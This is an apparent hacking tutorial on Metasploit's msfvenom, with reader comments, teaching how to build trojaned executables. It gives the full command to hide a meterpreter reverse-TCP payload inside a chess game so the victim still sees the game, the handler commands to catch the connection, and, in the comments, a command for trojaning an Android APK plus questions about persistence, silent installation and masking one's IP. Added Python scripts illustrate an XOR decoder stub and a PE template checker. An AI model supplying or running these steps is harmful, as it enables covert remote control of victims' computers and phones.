Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)

Welcome back, my hacker novitiates!

Evading antivirus (AV) software and intrusion detection systems (IDS) is one of the hacker's most critical tasks. As soon as a new exploit or payload is discovered in the wild, the AV and IDS vendors build a signature for it, and from then on the unmodified exploit is likely to be detected and blocked.

One obvious way around this problem is to develop your own exploits, and that is what we have begun to do in our Exploit Building series. Another method is to change the encoding of the payload, which changes its bytes and therefore the signature that an AV or IDS product matches on (with the important limitation discussed in the next section).

Previously, to re-encode a payload in Metasploit, you generated it with msfpayload and piped the output through msfencode, as shown in this earlier tutorial. Rapid7, the developers of Metasploit, replaced that clunky pair with a single command, msfvenom, which generates and encodes the payload in one step. msfpayload and msfencode were deprecated and have since been removed from the framework (June 2015), so msfvenom is now the only way to do this. Let's take a look at it in this guide.

A Quick Note About Re-Encoding Payloads

Re-encoding a Metasploit payload used to work for evading AV and other security devices, but the people who develop AV software are not dumb, and they have long since found ways to detect a re-encoded Metasploit payload. Keep in mind that Metasploit's encoders were never designed as an AV-evasion feature in the first place: their job is to remove "bad characters" (null bytes, newlines and the like) that would break the exploit delivering the payload.

Rather than signature the encoded payload bytes, which change with every key, the AV vendors signature the parts that do not change: the default executable template that msfvenom writes the payload into (the files under data/templates in the Metasploit install), and the small decoder stub that each encoder prepends to the payload so that it can decode itself at run time. No matter how many encoders or iterations you stack, the output still contains a known template and a known decoder, and the AV software has signatures for both.

Don't fret though, there are still ways to re-encode a payload that are still undetectable by AV software. I will be starting a new series soon on evading AV software where I will demonstrate many of the ways, so stay tuned for that.

Step 1: Fire Up Kali & Start Metasploit

Let's start by firing up Kali and opening a terminal. msfvenom is a standalone command-line program, separate from msfconsole, so you run it from the shell prompt. (Typing it inside msfconsole also works, because msfconsole hands any command it does not recognise to the shell and prints "exec: msfvenom", but the output is the same, so there is no reason to start msfconsole first.) You will still need msfconsole later, for the handler that catches the connection; you can start it by typing "msfconsole", or from the GUI via Applications -> Kali Linux -> Top 10 Security Tools -> Metasploit Framework.

Step 2: See the Msfvenom Options

Now, at the shell prompt, type msfvenom with the -h switch to pull up its help page.

kali > msfvenom -h

Let's take a look at some of the most important options in this list.

  • -p designates the Metasploit payload we want to use
  • -e designates the encoder we want to use
  • -a designates the architecture (x86, x64, ...); if omitted it is taken from the payload
  • -s designates the maximum size of the resulting payload
  • -i designates the number of encoding iterations; each one runs the encoder over the previous iteration's output
  • -x designates a custom executable file to use as a template
  • -f designates the output format (exe, raw, c and so on)
  • -o designates the output file; in current versions -o means --out, not "show options" (see Step 4)

Step 3: List the Encoders

Encoders are the various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Metasploit has numerous encoding schemes, and we can look at these by typing:

kali > msfvenom -l encoders

msfvenom will then list all of the available encoders with each one's rank and description. Among them is the x86/shikata_ga_nai encoder that we used in a previous tutorial (highlighted in the screenshot that accompanied the original post); note that shikata_ga_nai is ranked "excellent". The rank is Metasploit's reliability rating for the module, not a measure of how well it evades AV.
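What an encoder actually does, and why re-encoding alone does not hide a payload (the point made in the note above), is easier to see in code. The script below is an added example written for this page, not Metasploit's own encoder code. It implements a single-byte XOR encoder in the style of Metasploit's simplest x86 encoders: a position-independent decoder stub is prepended to the XORed bytes, the key is chosen so that no encoded byte is one of the declared bad characters, and extra iterations feed the whole previous output back in, which is what the -i switch does. The sample "shellcode" is a constructed byte string, not a real payload, and the stub is not itself checked against the bad characters. find_stub is the scanner's side of the argument: with the length and key bytes wildcarded, the stub matches whatever key was used. shikata_ga_nai is polymorphic (it varies the registers it uses and applies an additive feedback key), so its stub moves around more than this one, but it still has fixed structure that scanners key on.

```python
"""Single-byte XOR encoder with a hand-written x86 decoder stub.
Added example for this page (not Metasploit's encoder code): it shows what
an encoder does to a payload, what -i iterations do, and why the decoder
stub is a signature. SAMPLE is a constructed byte string, not real shellcode."""
import random

# Decoder stub, 20 bytes of position-independent x86. Only LEN (offset 6)
# and KEY (offset 9) change between runs; the other 18 bytes are constant.
#   00: eb 0d            jmp  short 0x0f   ; to the call
#   02: 5e               pop  esi          ; esi -> first encoded byte
#   03: 31 c9            xor  ecx, ecx
#   05: b1 LEN           mov  cl, LEN      ; 8-bit counter: max 255 bytes
#   07: 80 36 KEY        xor  byte [esi], KEY
#   0a: 46               inc  esi
#   0b: e2 fa            loop 0x07
#   0d: eb 05            jmp  short 0x14   ; into the decoded bytes
#   0f: e8 ee ff ff ff   call 0x02         ; pushes 0x14, the data address
#   14: <encoded bytes>
STUB_TEMPLATE = [0xEB, 0x0D, 0x5E, 0x31, 0xC9, 0xB1, None, 0x80, 0x36, None,
                 0x46, 0xE2, 0xFA, 0xEB, 0x05, 0xE8, 0xEE, 0xFF, 0xFF, 0xFF]
LEN_OFFSET, KEY_OFFSET = 6, 9
STUB_SIZE = len(STUB_TEMPLATE)


def build_stub(length, key):
    """Fill LEN and KEY into the constant stub."""
    if not 1 <= length <= 255:
        raise ValueError("this decoder uses an 8-bit counter: 1..255 bytes only")
    stub = list(STUB_TEMPLATE)
    stub[LEN_OFFSET], stub[KEY_OFFSET] = length, key
    return bytes(stub)


def candidate_keys(data, badchars):
    """Keys that are not bad characters and map no byte of data onto one.
    (Like msfvenom -b this only protects the encoded bytes; the stub itself
    is not checked here.)"""
    return [k for k in range(1, 256)
            if k not in badchars and all((b ^ k) not in badchars for b in data)]


def xor_encode(data, badchars=frozenset({0x00}), iterations=1, rng=None):
    """Prepend a stub and XOR the data with a random valid key. Each extra
    iteration feeds the whole previous output, stub included, back in,
    which is what msfvenom -i does. Returns (blob, keys_used)."""
    rng = rng or random.SystemRandom()
    blob, keys = bytes(data), []
    for _ in range(iterations):
        usable = candidate_keys(blob, badchars)
        if not usable:
            raise ValueError("no single-byte key avoids the bad characters")
        key = rng.choice(usable)
        blob = build_stub(len(blob), key) + bytes(b ^ key for b in blob)
        keys.append(key)
    return blob, keys


def xor_decode(blob, iterations=1):
    """Do in Python what the stub does on the CPU, to verify the round trip."""
    for _ in range(iterations):
        length, key = blob[LEN_OFFSET], blob[KEY_OFFSET]
        blob = bytes(b ^ key for b in blob[STUB_SIZE:STUB_SIZE + length])
    return blob


def find_stub(blob):
    """The scanner's view: match the stub with LEN and KEY wildcarded.
    Returns the offset of the first match, or -1."""
    n = len(STUB_TEMPLATE)
    for off in range(len(blob) - n + 1):
        if all(want is None or blob[off + i] == want
               for i, want in enumerate(STUB_TEMPLATE)):
            return off
    return -1


# Constructed stand-in for shellcode: just bytes, not executable code.
SAMPLE = bytes(range(0x41, 0x41 + 24))
BADCHARS = frozenset({0x00, 0x0A, 0x0D})

if __name__ == "__main__":
    blob_a, keys_a = xor_encode(SAMPLE, BADCHARS, iterations=2)
    blob_b, keys_b = xor_encode(SAMPLE, BADCHARS, iterations=2)
    print("keys used:", keys_a, keys_b)
    print("encoded bytes differ between runs:", blob_a[STUB_SIZE:] != blob_b[STUB_SIZE:])
    print("decoder stub found at offset:", find_stub(blob_a), find_stub(blob_b))
    print("round trip ok:", xor_decode(blob_a, 2) == SAMPLE)
```

Run it twice and compare: the encoded bytes change with the key, the decoder stub does not, and find_stub locates the outermost stub at offset 0 however many iterations you stack. That is exactly the property a signature writer exploits, and it is why custom stubs and encryption (not encoding) are what AV-evasion tooling relies on.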

Step 4: View the Payload Options

We can use msfvenom to check the options that we need to set for any payload, similar to "show options" in the Metasploit console. The command to check any payload's options is:

kali > msfvenom -p <payload name> --list-options

(The original version of this tutorial used -o for this. In the msfvenom shipped since mid-2015, -o means --out, the output file, which is why typing "-o" with no file name now fails with "error: missing required argument for option". Use --list-options instead.)

So, if we want to check the options for the windows/meterpreter/reverse_tcp payload, we simply type:

kali > msfvenom -p windows/meterpreter/reverse_tcp --list-options

When we do so, msfvenom prints the payload's options, including LHOST (the address the victim will connect back to), LPORT (the port it will connect to) and EXITFUNC, each with its current default and a description, followed by the payload's advanced options.

So, if we want to work with this payload, we now know what options we need to set in the msfvenom command.

Step 5: Create a Custom Windows Executable

Now, let's create a custom Windows executable with a custom template. Although we can create a payload without a custom template, we have a better chance of getting past security devices and AV if we use a custom template, since the default templates are well known to AV vendors. In this case, we will use a chess game named "chess.exe". The idea here is that we will embed the meterpreter payload into the chess game and then, when the victim opens the game to play chess, it will open a meterpreter session on our system. The template must be a native Windows executable whose architecture matches the payload (a 32-bit program for windows/meterpreter/reverse_tcp); a .NET program, a 64-bit binary or a file that is merely named .exe will produce an error or a broken output file.

I have placed the chess game in the /usr/share directory.

To create a malicious executable with the windows/meterpreter/reverse_tcp embedded inside, we simply type:

kali > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your local IP> LPORT=<the port you want to listen on> -x /usr/share/chess.exe -k -e x86/shikata_ga_nai -i 200 -f exe -o chess.exe

  • -p windows/meterpreter/reverse_tcp designates the payload we want to embed
  • LHOST designates the local host (your Kali IP address, the one the victim must be able to reach)
  • LPORT designates the port we want to listen on
  • -x designates the template we want to use and the path to it
  • -k keeps the template's original behaviour: the payload runs in a new thread and the chess game still starts, so the victim sees what they expect (without -k the payload replaces the program's entry point and the game never opens)
  • -e x86/shikata_ga_nai designates the encoder we want to use
  • -i 200 represents the number of encoding iterations; each iteration wraps the previous output in another decoder stub, so a count this high adds size and generation time rather than evasion, and a handful is plenty
  • -f exe designates we want to create an executable (.exe)
  • -o chess.exe designates the name of the file created, written in the current directory; the template in /usr/share is not modified, so don't be surprised that its size is unchanged

When the victim runs chess.exe, the meterpreter payload will be activated and will try to connect back to your system (LHOST). For the connection to succeed, the multi-handler in Metasploit must already be listening on the same LPORT with the same payload before the victim runs the file.

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST <your local IP>
msf > set LPORT <the port you chose above>

Then type exploit (or exploit -j to run the handler in the background). If nothing comes back, check the basics first: the victim can reach LHOST on LPORT (ping it, and make sure no firewall is in the way), and LHOST and LPORT are identical in the msfvenom command and in the handler.
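Most of the failures people hit with -x come from the template itself rather than from msfvenom: a file that is not a Windows PE at all (a text file renamed to .exe), a .NET assembly, a DLL, or an x64 image paired with an x86 payload. The checker below is an added example for this page, not Metasploit code, and it does not reproduce msfvenom's injection logic; it parses just enough of the PE headers to reject those cases before you run msfvenom. The sample executable is a constructed, header-only PE built in build_sample_pe() so the script runs offline; point check_template() at the real file you plan to pass to -x.

```python
"""Pre-flight check for a template handed to msfvenom -x.
Added example for this page, not Metasploit code. It reads only the PE
headers; it does not reproduce msfvenom's injection logic."""
import struct
import sys

MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64"}
ARCH_TO_MACHINE = {"x86": 0x014C, "x64": 0x8664}   # msfvenom -a values
IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
CLR_DIRECTORY = 14          # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def check_template(data, want_arch="x86"):
    """Return (ok, reason) for a candidate -x template. want_arch is the
    architecture of the payload you will embed ("x86" or "x64")."""
    try:
        if len(data) < 0x40 or data[:2] != b"MZ":
            return False, "not an MZ executable"
        pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
        if data[pe:pe + 4] != b"PE\0\0":
            return False, "no PE signature (not a Windows executable)"
        coff = pe + 4
        machine, nsect, _, _, _, opt_size, chars = struct.unpack_from(
            "<HHIIIHH", data, coff)
        opt = coff + 20
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic == 0x10B:
            fmt, nrva_off = "PE32", 92
        elif magic == 0x20B:
            fmt, nrva_off = "PE32+", 108
        else:
            return False, "unknown optional header magic 0x%x" % magic
        if machine != ARCH_TO_MACHINE.get(want_arch):
            return False, "machine %s does not match payload arch %s" % (
                MACHINE_NAMES.get(machine, hex(machine)), want_arch)
        if chars & IMAGE_FILE_DLL:
            return False, "file is a DLL, not an EXE"
        # A non-empty CLR directory means a .NET assembly: its entry point goes
        # through the runtime, not native code, so it is a poor template.
        nrva = struct.unpack_from("<I", data, opt + nrva_off)[0]
        if nrva > CLR_DIRECTORY:
            clr_rva, clr_size = struct.unpack_from(
                "<II", data, opt + nrva_off + 4 + 8 * CLR_DIRECTORY)
            if clr_rva or clr_size:
                return False, ".NET assembly (CLR header present)"
        sections = opt + opt_size
        for i in range(nsect):
            name, _, _, rawsize, _, _, _, _, _, flags = struct.unpack_from(
                "<8sIIIIIIHHI", data, sections + 40 * i)
            if flags & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE) and rawsize:
                return True, "%s %s with code section %s" % (
                    fmt, MACHINE_NAMES[machine],
                    name.rstrip(b"\0").decode("ascii", "replace"))
        return False, "no executable section with raw data"
    except struct.error:
        return False, "truncated PE headers"


def build_sample_pe(machine=0x014C, clr=False, dll=False):
    """Constructed header-only PE (no real code) used to exercise the checker
    offline; a real template is a complete executable."""
    magic, opt_size, nrva_off = ((0x10B, 224, 92) if machine == 0x014C
                                 else (0x20B, 240, 108))
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    chars = 0x0002 | (0x0100 if machine == 0x014C else 0)  # EXECUTABLE_IMAGE, 32BIT
    chars |= IMAGE_FILE_DLL if dll else 0
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, nrva_off, 16)             # NumberOfRvaAndSizes
    if clr:
        struct.pack_into("<II", opt, nrva_off + 4 + 8 * CLR_DIRECTORY, 0x2000, 72)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x200, 0x400,
                       0, 0, 0, 0,
                       IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            ok, reason = check_template(f.read(), sys.argv[2])
    else:
        ok, reason = check_template(build_sample_pe(), "x86")
    print("OK:" if ok else "REJECT:", reason)
```

Usage: python3 pe_check.py /usr/share/chess.exe x86 (the second argument is the payload architecture). A rejection here saves a confusing msfvenom error or a 0-byte output; a pass means only that the headers look right, not that msfvenom will succeed, so if it still fails, try one of the default templates in data/templates to separate template problems from command-line problems.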

msfvenom streamlines the process of encoding and embedding payloads, but it is no longer any guarantee of getting past AV software. I will be starting a new series on evading AV software soon with the latest techniques, so keep coming back, my hacker novitiates!

Cover images via Shutterstock (1, 2)

68 Comments

Hello sir, I'm new here. I know this is off the subject, but I'm going to university soon and I need your advice on whether to take the computer science program or the information technology program. Any information helps, thanks btw!

PS: My goal is to become a great hacker like you lol

Either path can help you become a great hacker. At most schools, the computer science program is more rigorous and will provide you greater depth. The information technology program will likely get a quicker start and then you can continue your education in security and hacking.

Thanks sir OTW for your advice. I think I will take the information technology program, as I'm not really familiar with programming yet.

Also, is it true that to bypass AV and find zero-day vulnerabilities you have to be really good at coding?

zst, hold your path and keep learning and practicing; that's what can make you a hacker... Last of all, this website will help you much :P, better than a school :D

Where will I get that output malicious file? Because the size of my file that resides in /usr/share has not changed.

King, you'll get the output file in the working directory of MSF. To specify, I usually do "> /root/out/file.exe" just to stay more organized.

Edited to delete... (please downvote so it disappears :p)

OTW

Hi, I am new on here and I've been following your tutorials; so far they've been great, amazing and pretty easy to follow. Please keep up this lovely and great work.

However, I've tried encoding an executable file just like above in your post and AV just won't give me a chance, even on my Grandpa's PC...

So, I'm really counting on your word that you'll post other, better ways to bypass AV. I know you must be a busy man and probably have so much on your hands, but I'd really appreciate it if you can make it soon... PLEASE!!!

Thanks In Advance

Phoenix

Metasploit encoding is not designed to evade AV but to deal with bad characters, etc. You can use executable envelopes which encrypt the executable. I suggest looking into the Veil framework.

OTW,

I followed your tutorial as precisely as I could. But I still get stuck on the part when I open the payload on my Windows 7 VM: it says it doesn't respond and I get no connection back to my Kali Linux, which has the same IP and port (on the LAN). It just says "Starting the payload handler". I believe it might be a connection problem, but I'm not sure.

Are you certain you can connect? Can you ping the system?

I found the problem: I was using Oracle VBox and it uses 10.x.x.x IPs (I used 192.168.1.x), though I could actually ping the system. I have resolved it by using a computer outside my LAN to see if it works, and it did. I still can't change the VBox IP, but at least it works.

You can change the IP inside VBox by simply typing:

ifconfig eth0 <new IP address>

Just a small question. Could you please tell me what the iterations option does?

The iterations option determines how many times the encoding scheme is run.

Thanks for the clarification

I am facing a problem here. Searched all over the internet.
"Offset 0 outside of image source"

Somebody please help with this error.

Mathew:

You really aren't giving us any information to work with. How about a screenshot?

It was my bad. I thought you could just do it with any .exe file, so I had created a notepad file and saved it as .exe. That was the problem. Anyway, I downloaded a chess game setup and tried it with that, but that too returned an error. Could you please tell me the reason for that? I then installed the game and used the .exe file of the game. The infected file was made, but when I tried opening it on the target system it just wouldn't open. I tried with vlc.exe (VLC media player) too, but same problem: the infected file is not opening. The target system is running Windows 8.1. What could be the problem?

Mathew:

It's really hard to diagnose your problem and help you with so little information. Could you send some screenshots to help us understand what you did and what might be going wrong?

OTW

Also the infected file has a size of just 6kB whereas the original file was over 8MB. I have attached the screenshot showing how I created the file.

From this screenshot, it looks like you copied the command incorrectly. There is a 0 before the f that should not be there.

Please check your typing first, before presenting your problem to this forum. We are not here to correct your typos.

Extremely sorry about that post. Really sorry. I corrected my mistake but the file is still not opening. I disabled the antivirus and the firewall also.

Where did you get this executable template? It is most likely the source of your problems, and msfvenom isn't able to properly insert the payload. Try one of the default templates in Metasploit before trying your own. The default templates are located in the /usr/share/metasploit-framework/data/templates directory.

Thanks for the tutorial. (I made a C++ program a while back that generates a script that randomly uses different encoders.)

Anyway, what I am interested in is how you can make the payload persistent, so that it calls back to the attacker machine every half hour or so.

Another cool thing would be: how can I make a free server online and have the callback go there?

Well, just set the LHOST to the server IP.

I don't know about "persistent," but I do know it's possible. You might have to make your own shellcode, though. I'm pretty sure MSFVenom doesn't come with an option like that.

Hello!
Consider that I am a very, very new beginner at using Metasploit!

I saw many tutorials teaching how to create payloads for Android, but all teach only how to create a unique APK for the payload. Would it be possible to embed the payload in an APK (or for example a picture) that already exists, in the same way that is done in this tutorial (creating a custom picture or APK with a custom picture or APK template)?

Thank you!
Sorry, bad English! (Google Translate)

Yes, it's possible! The command is as follows:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<port> -x <existing apk file> R -o <file to output>

  • The -p option selects the payload
  • The -x option selects the template file (the file you want to add the payload to)
  • The R stands for shellcode
  • The -o option means your output file

So, this command reads: create a file with the payload of the Android meterpreter using the template file, and make a new file with the payload in it...

I couldn't make it work

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload

Hey, thanks for the tip! Does this still launch on the phone? And is there a way to install it silently (without user interaction) after editing the manifests of the APK?

I am typing the command

msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.88 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 200 -f exe > evil.exe

And all it outputs is a 0-byte file that Windows cannot run. The command runs fine.

Good tutorial. I'm just wondering, can I use a dynamic DNS name instead of a public IP address when making the trojan.apk, i.e. name.servehttp.com? Also, can my IP be tracked by doing this? Would it be good to use a VPN of some kind when deploying this hack?

Hello !

I'm a beginner using Metasploit. I successfully made a payload following your tutorials and tested it with Windows 8, and it works. My question is, how can I hack a remote computer over the WAN? I only tested it on the LAN.

Thank you
Sorry for the bad English

You can set the LHOST to your external IP I believe.

Hi, when I try to find the options for the payload, it won't come up for me. Here's my screenshot. Sorry, very new to this.

file:///root/Pictures/Screenshot%20from%202015-09-26%2021:45:54.png

Sorry, it won't seem to let me upload a picture, but it says: error: missing required argument for option.
That's after I type msfvenom -p windows/meterpreter/reversetcp -o

Couldn't we just run killav.rb to stop the AV?
(Sorry, I found this thread late.)

killav only works after you have the payload on the system. In many cases, the AV will keep you from ever getting the payload on the system.

In one of the other guides (the "spying" one) we had to specify the exploit we had to use, like "use exploit/windows/fileformat/ms14_017_rtf". In this guide I did not see where we would do this.

Is this a totally different thing?

Also, is this persistent, so that we may come back to the victim later?

Thanks

The payload is specified with the -p (for payload) option. It's written above:
"-p windows/meterpreter/reverse_tcp designates the payload we want to embed"

Also, to answer your second question, this has nothing to do with persistence. Once you have a meterpreter session you can run your post-exploitation modules, including persistence, pivoting, etc.

Hello!
Before I start I'd like to say this is a very good tut. Nice work!

I followed your tutorial and I successfully created a payload, but its size is 0 bytes. I retried many times but still got the same result. I can't open it on my (test) phone either, as it shows "Error parsing the package".

Am I missing something? Please help me.
Thanks in advance!!

The results you cite are usually a result of typographical errors. Can you post a screenshot?

Here is a screenshot. As you can see, the command was executed successfully without any error message but the payload (ie FinalPayload.exe) is 0bytes.


My guess is that the file Core-Temp-Setup.exe either doesn't exist, is empty or is not an exe.

It really exists. I put it there myself and I have tried with other exe files.

You need to use one of the default templates built into Metasploit. Metasploit can't work with your exe.

hello Sir

Firstly, I am very thankful to you for the information; what you gave us is absolutely great. I have a small doubt: if I want to send that file by other means than the game, like port forwarding etc., how do I send it? Please can you tell me the process that I have to follow? This is purely for educational purposes, not with any other intention. Being a B.Tech computer science student, I want to learn hacking and become an ethical hacker and a pro like you, Sir. So if you understand, please help me with the required information.

Thank you
Sir

Welcome to Null Byte!

I'm not sure what you are asking here. Will you try re-stating your question?

OTW

I opened the Metasploit framework and typed in: msfvenom. It shows "* exec: msfvenom" (without quotes). After a few seconds, I automatically get returned to the msf prompt. I am using the latest Kali Linux (as of Jan 2016). Please help, sir!

msfvenom is separate from Metasploit.

Try running msfvenom from the terminal, not from inside msfconsole.

Hi everybody. I am having the same problem. I can't view the payload options.
On that same note, I can only view the encoders and msfvenom options if I run under sudo.
I am running Metasploit from the terminal, not from inside msfconsole.
Can anybody tell me what could be wrong here? Thanks.

Hello!
When I try to run the .exe on my Windows VM it just crashes (doesn't respond).
I used the template_x86_windows.exe from Metasploit (VM OS: Win7 x86).
The encoding worked without errors and I can ping my VM / host.

I also tried it with another encoder; then the program doesn't crash and I see that the VM tries to reach my host (Wireshark), but still my shell won't open. I started the handler and set all options (LHOST, LPORT).

Does someone have a clue what i could be missing?
Thanks!

Did you ever figure this out?

I'm interested in whether you have found a solution to your issue.

I am typing the command

msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.88 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 200 -f exe > evil.exe

And all it outputs is a 0-byte file that Windows cannot run. The command runs fine.

Change "reversetcp" to "reverse_tcp"

Sir, I am getting this error while running msfvenom and msfpayload.

Can you please help me.

Hello Sir, I'm new here, but I'm having some issues with msfvenom. It'll make payloads just fine, except for one thing: when I send the payload to my computer and open the file, it'll open just fine, but msfconsole won't get a connection back. I'm just wanting some help with that issue.

Hello OTW,

Like some of us, I am having trouble with typing the following command:
msfvenom -p windows/meterpreter/reverse_tcp -o

Metasploit always returns the same answer: error: missing required argument for option.

I have been trying to check where I made a mistake, but I can't figure it out.
Hope you'll help :/

Kane

Do msfvenom -h and check the options for the payload.

Hi OTW,
I was wondering how to find your local IP. Is it from your router, or when you look up "ip" on Google?

Your local IP is the IP address of your local machine.
Your IP address on Google is your public IP, the one that can be reached from the internet.
Do ipconfig on Windows and ifconfig on Linux systems.

I have encountered this issue and I have tried the same argument inside msfconsole and without it; thereby I failed to create the chess.exe file as well. My computer OS is Windows 10 x64; msfconsole successfully worked, but I cannot figure out the relevant problem. Note that I also used the statement following the Usage statement.

Can anyone help me with this? I cannot proceed to the next step.

Also have a look at this please.
